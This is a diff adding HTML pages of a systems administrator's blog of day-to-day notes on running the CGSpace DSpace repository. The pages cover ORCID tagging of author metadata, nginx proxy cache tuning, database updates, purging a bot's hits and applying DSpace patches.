+</span></span><span style="display:flex;"><span>&#34;Marshall, Karen&#34;,&#34;Karen Marshall: 0000-0003-4197-1455&#34;
+</span></span><span style="display:flex;"><span>&#34;Notenbaert, An Maria Omer&#34;,&#34;An Maria Omer Notenbaert: 0000-0002-6266-2240&#34;
+</span></span><span style="display:flex;"><span>&#34;Ojango, Julie M.K.&#34;,&#34;Ojango J.M.K.: 0000-0003-0224-5370&#34;
+</span></span><span style="display:flex;"><span>&#34;Wijk, Mark T. van&#34;,&#34;Mark van Wijk: 0000-0003-0728-8839&#34;
+</span></span><span style="display:flex;"><span>&#34;Tarawali, Shirley A.&#34;,&#34;Shirley Tarawali: 0000-0001-9398-8780&#34;
+</span></span><span style="display:flex;"><span>&#34;Naessens, Jan&#34;,&#34;Jan Naessens: 0000-0002-7075-9915&#34;
+</span></span><span style="display:flex;"><span>&#34;Butterbach-Bahl, Klaus&#34;,&#34;Klaus Butterbach-Bahl: 0000-0001-9499-6598&#34;
+</span></span><span style="display:flex;"><span>&#34;Poole, Elizabeth J.&#34;,&#34;Elizabeth Jane Poole: 0000-0002-8570-794X&#34;
+</span></span><span style="display:flex;"><span>&#34;Mulema, Annet A.&#34;,&#34;Annet Mulema: 0000-0003-4192-3939&#34;
+</span></span><span style="display:flex;"><span>&#34;Dror, Iddo&#34;,&#34;Iddo Dror: 0000-0002-0800-7456&#34;
+</span></span><span style="display:flex;"><span>&#34;Ballantyne, Peter G.&#34;,&#34;Peter G. Ballantyne: 0000-0001-9346-2893&#34;
+</span></span><span style="display:flex;"><span>&#34;Baker, Derek&#34;,&#34;Derek Baker: 0000-0001-6020-6973&#34;
+</span></span><span style="display:flex;"><span>&#34;Ericksen, Polly J.&#34;,&#34;Polly Ericksen: 0000-0002-5775-7691&#34;
+</span></span><span style="display:flex;"><span>&#34;Jones, Christopher S.&#34;,&#34;Chris Jones: 0000-0001-9096-9728&#34;
+</span></span><span style="display:flex;"><span>&#34;Mude, Andrew G.&#34;,&#34;Andrew Mude: 0000-0003-4903-6613&#34;
+</span></span><span style="display:flex;"><span>&#34;Puskur, Ranjitha&#34;,&#34;Ranjitha Puskur: 0000-0002-9112-3414&#34;
+</span></span><span style="display:flex;"><span>&#34;Kiara, Henry K.&#34;,&#34;Henry Kiara: 0000-0001-9578-1636&#34;
+</span></span><span style="display:flex;"><span>&#34;Gibson, John P.&#34;,&#34;John Gibson: 0000-0003-0371-2401&#34;
+</span></span><span style="display:flex;"><span>&#34;Flintan, Fiona E.&#34;,&#34;Fiona Flintan: 0000-0002-9732-097X&#34;
+</span></span><span style="display:flex;"><span>&#34;Mrode, Raphael A.&#34;,&#34;Raphael Mrode: 0000-0003-1964-5653&#34;
+</span></span><span style="display:flex;"><span>&#34;Mtimet, Nadhem&#34;,&#34;Nadhem Mtimet: 0000-0003-3125-2828&#34;
+</span></span><span style="display:flex;"><span>&#34;Said, Mohammed Yahya&#34;,&#34;Mohammed Yahya Said: 0000-0001-8127-6399&#34;
+</span></span><span style="display:flex;"><span>&#34;Pezo, Danilo A.&#34;,&#34;Danilo Pezo: 0000-0001-5345-5314&#34;
+</span></span><span style="display:flex;"><span>&#34;Haileslassie, Amare&#34;,&#34;Amare Haileslassie: 0000-0001-5237-9006&#34;
+</span></span><span style="display:flex;"><span>&#34;Wright, Iain A.&#34;,&#34;Iain Wright: 0000-0002-6216-5308&#34;
+</span></span><span style="display:flex;"><span>&#34;Cadilhon, Joseph J.&#34;,&#34;Jean-Joseph Cadilhon: 0000-0002-3181-5136&#34;
+</span></span><span style="display:flex;"><span>&#34;Domelevo Entfellner, Jean-Baka&#34;,&#34;Jean-Baka Domelevo Entfellner: 0000-0002-8282-1325&#34;
+</span></span><span style="display:flex;"><span>&#34;Oyola, Samuel O.&#34;,&#34;Samuel O. Oyola: 0000-0002-6425-7345&#34;
+</span></span><span style="display:flex;"><span>&#34;Agaba, M.&#34;,&#34;Morris Agaba: 0000-0001-6777-0382&#34;
+</span></span><span style="display:flex;"><span>&#34;Beebe, Stephen E.&#34;,&#34;Stephen E Beebe: 0000-0002-3742-9930&#34;
+</span></span><span style="display:flex;"><span>&#34;Ouso, Daniel&#34;,&#34;Daniel Ouso: 0000-0003-0994-2558&#34;
+</span></span><span style="display:flex;"><span>&#34;Ouso, Daniel O.&#34;,&#34;Daniel Ouso: 0000-0003-0994-2558&#34;
+</span></span><span style="display:flex;"><span>&#34;Rono, Gilbert K.&#34;,&#34;Gilbert Kibet-Rono: 0000-0001-8043-5423&#34;
+</span></span><span style="display:flex;"><span>&#34;Kibet, Gilbert&#34;,&#34;Gilbert Kibet-Rono: 0000-0001-8043-5423&#34;
+</span></span><span style="display:flex;"><span>&#34;Juma, John&#34;,&#34;John Juma: 0000-0002-1481-5337&#34;
+</span></span><span style="display:flex;"><span>&#34;Juma, J.&#34;,&#34;John Juma: 0000-0002-1481-5337&#34;
+</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2022-09-22-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
+</span></span></code></pre></div><ul>
+<li>This adds nearly 5,500 ORCID tags!
+<ul>
+<li>Some of these authors were not in the controlled vocabulary so I added them</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-09-23">2022-09-23</h2>
+<ul>
+<li>Tag some more ORCID metdata (amended above)</li>
+<li>Meeting with Peter and Abenet to discuss CGSpace issues
+<ul>
+<li>We found a workable solution to the MEL submission issue: they can submit to a dedicated MEL-only collection with no workflow and we will map or move the items after</li>
+</ul>
+</li>
+<li>Pascal says that they have made a <a href="https://github.com/DSpace/DSpace/pull/8415">pull request for their duplicate checker on DSpace 7</a> yayyyy</li>
+</ul>
+<h2 id="2022-09-24">2022-09-24</h2>
+<ul>
+<li>Found some more ORCID identifiers to tag so I added them to the list above</li>
+<li>Start a harvest on AReS around 8PM on Saturday night</li>
+</ul>
+<h2 id="2022-09-25">2022-09-25</h2>
+<ul>
+<li>The harvest on AReS finished and now the load on CGSpace server is still high like always on Sunday mornings
+<ul>
+<li>UptimeRobot says it&rsquo;s down sigh&hellip;</li>
+</ul>
+</li>
+<li>I had an idea to include the HTTP Accept header in the nginx proxy cache key to fix the issue we had with CIP last week
+<ul>
+<li>It seems to work:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&amp;limit=10&amp;offset=60&#39;
+...
+Content-Type: application/json
+X-Cache-Status: MISS
+
+$ http --print Hh &#39;https://dspacetest.cgiar.org/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&amp;limit=10&amp;offset=60&#39;
+...
+Content-Type: application/json
+X-Cache-Status: HIT
+
+$ http --print Hh &#39;https://dspacetest.cgiar.org/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&amp;limit=10&amp;offset=60&#39; Accept:application/xml
+...
+Content-Type: application/xml
+X-Cache-Status: MISS
+
+$ http --print Hh &#39;https://dspacetest.cgiar.org/rest/items?expand=metadata,parentCommunityList,parentCollectionList,bitstreams&amp;limit=10&amp;offset=60&#39; Accept:application/xml
+...
+Content-Type: application/xml
+X-Cache-Status: HIT
+</code></pre><ul>
+<li>This effectively makes our cache half as effective, but hopefully as more people start harvesting the number of requests handled by it will go up</li>
+<li>I will enable this on CGSpace and email Moises from CIP to check if their harvester is working</li>
+</ul>
+<h2 id="2022-09-26">2022-09-26</h2>
+<ul>
+<li>Update welcome text on CGSpace after our meeting last week</li>
+<li>I found another dozen or so ORCIDs for top authors on ILRI&rsquo;s community on CGSpace and tagged them (~1,100 more metadata fields)</li>
+<li>Last week we discussed moving <code>cg.identifier.googleurl</code> to <code>cg.identifier.url</code> since there is no need to treat Google Books URLs specially anymore as far as we know
+<ul>
+<li>I made the changes to the submission form and the XMLUI item displays, then moved all existing metadata in PostgreSQL:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace= ☘ UPDATE metadatavalue SET metadata_field_id=219 WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=222;
+</span></span><span style="display:flex;"><span>UPDATE 1137
+</span></span></code></pre></div><ul>
+<li>Then I deleted <code>cg.identifier.googleurl</code> from the metadata registry</li>
+<li>Meeting with Salem, Svetlana, Valentina, and Abenet about MEL depositing to CGSpace for the initiatives
+<ul>
+<li>Submitting to a collection without a workflow works as expected, and we can even select another collection (with a workflow) to map the item to from the MEL submission</li>
+<li>The three minor issues we found were:
+<ul>
+<li>MEL still doesn&rsquo;t send the bitstream</li>
+<li>MEL sends metadata with a download URL on mel.cgiar.org</li>
+<li>MEL sends a JPEG that says &ldquo;no thumbnail&rdquo; when an item doesn&rsquo;t have a thumbnail</li>
+</ul>
+</li>
+<li>I still need to send feedback to the group</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-09-27">2022-09-27</h2>
+<ul>
+<li>Find a few more ORCID identifiers missing for ILRI authors and add them to the controlled vocabulary and tag the authors on CGSpace</li>
+<li>Moises from CIP says the WordPress importer worked fine with the current nginx proxy cache settings so it seems adding the HTTP Accept header to the cache key worked</li>
+<li>Update my DSpace 7 environments to 7.4-SNAPSHOT
+<ul>
+<li>I see they have added thumbnails in some places now</li>
+<li>Oh nice, they also added the &ldquo;recent submissions&rdquo; to the home page</li>
+</ul>
+</li>
+<li>While talking with Salem about the MEL depositing to CGSpace we discovered an issue with HTTP DELETE on <code>/items/{item id}/bitstreams/{bitstream id}</code> or <code>/bitstreams/{bitstream id}</code>
+<ul>
+<li>DSpace removes the bitstream but keeps the empty <code>THUMBNAIL</code> bundle, which breaks the display in XMLUI</li>
+</ul>
+</li>
+<li>Meeting with Enrico et al about PRMS reporting for the initiatives</li>
+</ul>
+<h2 id="2022-09-28">2022-09-28</h2>
+<ul>
+<li>I was reading the source code for DSpace 6&rsquo;s REST API and found that it&rsquo;s <a href="https://github.com/DSpace/DSpace/blob/dspace-6.4/dspace-rest/src/main/java/org/dspace/rest/ItemsResource.java#L427">not possible to specify a bundle while POSTing a bitstream</a>
+<ul>
+<li>I asked Salem how they do it on MEL and he said they pretend to be a human and do it via XMLUI!</li>
+</ul>
+</li>
+<li>I added a few new ILRI subjects to the input forms on CGSpace
+<ul>
+<li>Both &ldquo;bushmeat&rdquo; and &ldquo;wildlife conservation&rdquo; are AGROVOC terms, but &ldquo;wild meat&rdquo; is not</li>
+<li>The distinction ILRI would like to start making is:</li>
+</ul>
+</li>
+</ul>
+<blockquote>
+<p>Meat comes from any animal, and when at ILRI we specifically make
+reference to it in the context of livestock. However the word bushmeat
+refers to illegal harvesting of meat. wild meat is being used as legal
+harvesting of meat from wildlife and not from livestock.</p>
+</blockquote>
+<ul>
+<li>I added a few more CGIAR authors ORCID identifiers to our controlled vocabulary and tagged them on CGSpace (~450 more metadata fields)</li>
+<li>Talking to Salem about ORCID identifiers, we compared list and they have a bunch that we don&rsquo;t have:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml ~/Downloads/MEL_ORCID_2022-09-28.csv | <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | \
+</span></span><span style="display:flex;"><span>  sort | \
+</span></span><span style="display:flex;"><span>  uniq &gt; /tmp/2022-09-29-combined-orcids.txt
+</span></span><span style="display:flex;"><span>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>1421
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/2022-09-29-combined-orcids.txt 
+</span></span><span style="display:flex;"><span>1905 /tmp/2022-09-29-combined-orcids.txt
+</span></span></code></pre></div><ul>
+<li>After combining them I ran them through my <code>resolve-orcids.py</code> script:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/resolve-orcids.py -i /tmp/2022-09-29-combined-orcids.txt -o /tmp/2022-09-29-combined-orcids-names.txt -d
+</span></span></code></pre></div><ul>
+<li>I wrote a script <code>update-orcids.py</code> to read a list of names and ORCID identifiers and update existing metadata in the database to the latest name format</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/update-orcids.py -i ~/src/git/cgspace-submission-guidelines/content/terms/cg-creator-identifier/cg-creator-identifier.txt -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -m <span style="color:#ae81ff">247</span> -d
+</span></span><span style="display:flex;"><span>Connected to database.
+</span></span><span style="display:flex;"><span>Fixed 9 occurences of: ADEBOWALE AD AKANDE: 0000-0002-6521-3272
+</span></span><span style="display:flex;"><span>Fixed 43 occurences of: Alamu Emmanuel Oladeji (PhD, FIFST, MNIFST): 0000-0001-6263-1359
+</span></span><span style="display:flex;"><span>Fixed 3 occurences of: Alessandra Galie: 0000-0001-9868-7733
+</span></span><span style="display:flex;"><span>Fixed 1 occurences of: Amanda De Filippo: 0000-0002-1536-3221
+</span></span><span style="display:flex;"><span>...
+</span></span></code></pre></div><h2 id="2022-09-29">2022-09-29</h2>
+<ul>
+<li>I&rsquo;ve been checking the size of the nginx proxy cache the last few days and it always seems to hover around 14,000 entries and 385MB:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># find /var/cache/nginx/rest_cache/ -type f | wc -l
+</span></span><span style="display:flex;"><span>14202
+</span></span><span style="display:flex;"><span># du -sh /var/cache/nginx/rest_cache
+</span></span><span style="display:flex;"><span>384M    /var/cache/nginx/rest_cache
+</span></span></code></pre></div><ul>
+<li>Also on that note I&rsquo;m trying to implement a workaround for a potential caching issue that causes MEL to not be able to update items on DSpace Test
+<ul>
+<li>I <em>think</em> we might need to allow requests with a JSESSIONID to bypass the cache, but I have to verify with Salem</li>
+<li>We can do this with an nginx map:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># Check <span style="color:#66d9ef">if</span> the JSESSIONID cookie is present and contains a 32-character hex
+</span></span><span style="display:flex;"><span># value, which would mean that a user is actively attempting to re-use their
+</span></span><span style="display:flex;"><span># Tomcat session. Then we set the $active_user_session variable and use it
+</span></span><span style="display:flex;"><span># to bypass the nginx proxy cache in REST requests.
+</span></span><span style="display:flex;"><span>map $cookie_jsessionid $active_user_session {
+</span></span><span style="display:flex;"><span>    # requests with an empty key are not evaluated by limit_req
+</span></span><span style="display:flex;"><span>    # see: http://nginx.org/en/docs/http/ngx_http_limit_req_module.html
+</span></span><span style="display:flex;"><span>    default &#39;&#39;;
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>    &#39;~[A-Z0-9]{32}&#39; 1;
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li>Then in the location block where we do the proxy cache:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>            # Don&#39;t cache when user Shift-refreshes (Cache-Control: no-cache) or
+</span></span><span style="display:flex;"><span>            # when a client has an active session (see the $cookie_jsessionid map).
+</span></span><span style="display:flex;"><span>            proxy_cache_bypass $http_cache_control $active_user_session;
+</span></span><span style="display:flex;"><span>            proxy_no_cache $http_cache_control $active_user_session;
+</span></span></code></pre></div><ul>
+<li>I found one client making 10,000 requests using a Windows 98 user agent:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
+</span></span></code></pre></div><ul>
+<li>They all come from one IP address (129.227.149.43) in Hong Kong
+<ul>
+<li>The IP belongs to a hosting provider called Zenlayer</li>
+<li>I will add this IP to the nginx bot networks and purge its hits</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ip -p
+</span></span><span style="display:flex;"><span>Purging 33027 hits from 129.227.149.43 in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 33027
+</span></span></code></pre></div><ul>
+<li>So it seems we&rsquo;ve seen this bot before and the total number is much higher than the 10,000 this month</li>
+<li>I had a call with Salem and we verified that the nginx cache bypass for clients who provide a JSESSIONID fixes their issue with updating items/bitstreams from MEL
+<ul>
+<li>The issue was that they delete all metadata and bitstreams, then add them again to make sure everything is up to date, and in that process they also re-request the item with all expands to get the bitstreams, which ends up getting cached and then they try to delete the old bitstream</li>
+</ul>
+</li>
+<li>I also noticed that someone made a <a href="https://github.com/DSpace/DSpace/pull/8343">pull request to enable POSTing bitstreams to a particular bundle</a> and it works, so that&rsquo;s awesome!</li>
+</ul>
+<h2 id="2022-09-30">2022-09-30</h2>
+<ul>
+<li>I applied <a href="https://github.com/DSpace/DSpace/pull/8343">the patch for POSTing bitstreams to other bundles</a> on CGSpace</li>
+<li>Testing a few other DSpace 6.4 patches on DSpace Test:
+<ul>
+<li><a href="https://github.com/DSpace/DSpace/pull/1901">DS-3791 Make sure the &ldquo;yearDifference&rdquo; takes into account that a gap of 10 year contains 11 years</a></li>
+<li><a href="https://github.com/DSpace/DSpace/pull/2501">DS-3873 Limit the usage of PDFBoxThumbnail to PDFs</a></li>
+<li><a href="https://github.com/DSpace/DSpace/pull/2161">Reduce itemCounter init</a></li>
+<li><a href="https://github.com/DSpace/DSpace/pull/2201">ImageMagick: Only execute &ldquo;identify&rdquo; on first page</a></li>
+<li><a href="https://github.com/DSpace/DSpace/pull/2371">DS-3881: Show no total results on search-filter</a></li>
+<li><a href="https://github.com/DSpace/DSpace/pull/2699">pass value instead of qualifier to method</a></li>
+<li><a href="https://github.com/DSpace/DSpace/pull/7993">dspace-api: check for null AND empty qualifier in findByElement()</a></li>
+<li><a href="https://github.com/DSpace/DSpace/pull/7995">Avoid exporting mapped Item more than once</a></li>
+<li><a href="https://github.com/DSpace/DSpace/pull/3162">[DS-4574] v. 6 - Upgrade DBCP2 dependency</a></li>
+<li><a href="https://github.com/DSpace/DSpace/pull/2742">bump up pdfbox version on 6.x to match main branch</a></li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2022-10/index.html b/docs/2022-10/index.html
new file mode 100644
index 000000000..eed034baa
--- /dev/null
+++ b/docs/2022-10/index.html
@@ -0,0 +1,1032 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="October, 2022" />
+<meta property="og:description" content="2022-10-01
+
+Start a harvest on AReS last night
+Yesterday I realized how to use GraphicsMagick with im4java and I want to re-visit some of my thumbnail tests
+
+I&rsquo;m also interested in libvips support via jVips, though last time I checked it was only for Java 8
+I filed an issue to ask about Java 11&#43; support
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-10/" />
+<meta property="article:published_time" content="2022-10-01T19:45:36+03:00" />
+<meta property="article:modified_time" content="2023-04-18T11:08:15-07:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="October, 2022"/>
+<meta name="twitter:description" content="2022-10-01
+
+Start a harvest on AReS last night
+Yesterday I realized how to use GraphicsMagick with im4java and I want to re-visit some of my thumbnail tests
+
+I&rsquo;m also interested in libvips support via jVips, though last time I checked it was only for Java 8
+I filed an issue to ask about Java 11&#43; support
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "October, 2022",
+  "url": "https://alanorth.github.io/cgspace-notes/2022-10/",
+  "wordCount": "3768",
+  "datePublished": "2022-10-01T19:45:36+03:00",
+  "dateModified": "2023-04-18T11:08:15-07:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2022-10/">
+
+    <title>October, 2022 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-10/">October, 2022</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2022-10-01T19:45:36+03:00">Sat Oct 01, 2022</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-10-01">2022-10-01</h2>
+<ul>
+<li>Start a harvest on AReS last night</li>
+<li>Yesterday I realized how to use <a href="https://im4java.sourceforge.net/docs/dev-guide.html">GraphicsMagick with im4java</a> and I want to re-visit some of my thumbnail tests
+<ul>
+<li>I&rsquo;m also interested in libvips support via jVips, though last time I checked it was only for Java 8</li>
+<li>I filed <a href="https://github.com/criteo/JVips/issues/141">an issue to ask about Java 11+ support</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-10-03">2022-10-03</h2>
+<ul>
+<li>Make two pull requests for DSpace 7.x
+<ul>
+<li><a href="https://github.com/DSpace/DSpace/pull/8503">Update PDFBox dependency to version 2.0.27</a></li>
+<li><a href="https://github.com/DSpace/DSpace/pull/8504">Update Apache commons-dbcp2 and commons-pool2 dependencies</a></li>
+</ul>
+</li>
+<li>Udana had asked me about their RSS feed and it not showing the latest publications in his email inbox
+<ul>
+<li>He is using this feed from FeedBurner: <a href="https://feeds.feedburner.com/iwmi-cgspace">https://feeds.feedburner.com/iwmi-cgspace</a></li>
+<li>I don&rsquo;t have access to the FeedBurner configuration, but I looked at the <a href="https://gist.github.com/alanorth/0c518fc571f450f8cc353c42cbdd277c">raw feed</a> and see it&rsquo;s just getting all the items in the IWMI community</li>
+<li>This OpenSearch query should do the same: <code>https://cgspace.cgiar.org/open-search/discover?scope=10568/16814&amp;query=*&amp;sort_by=3&amp;order=DESC</code></li>
+<li>The <code>sort_by=3</code> corresponds to <code>webui.itemlist.sort-option.3 = dateaccessioned:dc.date.accessioned:date</code> in dspace.cfg</li>
+</ul>
+</li>
+<li>Peter sent me a CSV file a few days ago that he was unable to upload to CGSpace
+<ul>
+<li>The stacktrace from the error he was getting was:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Java stacktrace: java.lang.ClassCastException: org.apache.cocoon.servlet.multipart.PartInMemory cannot be cast to org.dspace.app.xmlui.cocoon.servlet.multipart.DSpacePartOnDisk
+</span></span><span style="display:flex;"><span>    at org.dspace.app.xmlui.aspect.administrative.FlowMetadataImportUtils.processUploadCSV(FlowMetadataImportUtils.java:116)
+</span></span><span style="display:flex;"><span>    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+</span></span><span style="display:flex;"><span>    at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+</span></span><span style="display:flex;"><span>    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>    at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>    at org.mozilla.javascript.MemberBox.invoke(MemberBox.java:155)
+</span></span><span style="display:flex;"><span>    at org.mozilla.javascript.NativeJavaMethod.call(NativeJavaMethod.java:243)
+</span></span><span style="display:flex;"><span>    at org.mozilla.javascript.Interpreter.interpretLoop(Interpreter.java:3237)
+</span></span><span style="display:flex;"><span>    at org.mozilla.javascript.Interpreter.interpret(Interpreter.java:2394)
+</span></span><span style="display:flex;"><span>    at org.mozilla.javascript.InterpretedFunction.call(InterpretedFunction.java:162)
+</span></span><span style="display:flex;"><span>    at org.mozilla.javascript.ContextFactory.doTopCall(ContextFactory.java:393)
+</span></span><span style="display:flex;"><span>    at org.mozilla.javascript.ScriptRuntime.doTopCall(ScriptRuntime.java:2834)
+</span></span><span style="display:flex;"><span>    at org.mozilla.javascript.InterpretedFunction.call(InterpretedFunction.java:160)
+</span></span><span style="display:flex;"><span>    at org.mozilla.javascript.Context.call(Context.java:538)
+</span></span><span style="display:flex;"><span>    at org.mozilla.javascript.ScriptableObject.callMethod(ScriptableObject.java:1833)
+</span></span><span style="display:flex;"><span>    at org.mozilla.javascript.ScriptableObject.callMethod(ScriptableObject.java:1803)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.flow.javascript.fom.FOM_JavaScriptInterpreter.handleContinuation(FOM_JavaScriptInterpreter.java:698)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.CallFunctionNode.invoke(CallFunctionNode.java:94)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+</span></span><span style="display:flex;"><span>    at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
